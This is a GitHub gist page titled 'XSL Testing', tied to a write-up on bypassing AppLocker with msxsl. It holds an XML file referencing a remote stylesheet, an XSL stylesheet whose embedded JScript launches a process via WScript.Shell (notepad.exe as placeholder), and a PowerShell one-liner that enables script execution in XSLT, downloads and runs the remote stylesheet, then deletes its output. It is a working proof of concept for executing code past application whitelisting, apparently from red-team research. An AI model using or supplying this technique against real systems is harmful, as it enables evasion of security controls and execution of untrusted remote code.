Last active
September 26, 2022 23:29
-
-
Save bohops/ee9e2d7bdd606c264a0c6599b0146599 to your computer and use it in GitHub Desktop.
XSL Testing (++++++ netbiosX and subTee) - https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0"?> | |
| <?xml-stylesheet type="text/xsl" href="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/6456162763d2bb427e71e41f84792867cb1b4c0f/xsl-notepad.xsl" ?> | |
| <customers> | |
| <customer> | |
| <name>Microsoft</name> | |
| </customer> | |
| </customers> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version='1.0'?> | |
| <xsl:stylesheet version="1.0" | |
| xmlns:xsl="http://www.w3.org/1999/XSL/Transform" | |
| xmlns:msxsl="urn:schemas-microsoft-com:xslt" | |
| xmlns:user="http://mycompany.com/mynamespace"> | |
| <msxsl:script language="JScript" implements-prefix="user"> | |
| function xml(nodelist) { | |
| var r = new ActiveXObject("WScript.Shell").Run("notepad.exe"); | |
| return nodelist.nextNode().xml; | |
| } | |
| </msxsl:script> | |
| <xsl:template match="/"> | |
| <xsl:value-of select="user:xml(.)"/> | |
| </xsl:template> | |
| </xsl:stylesheet> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment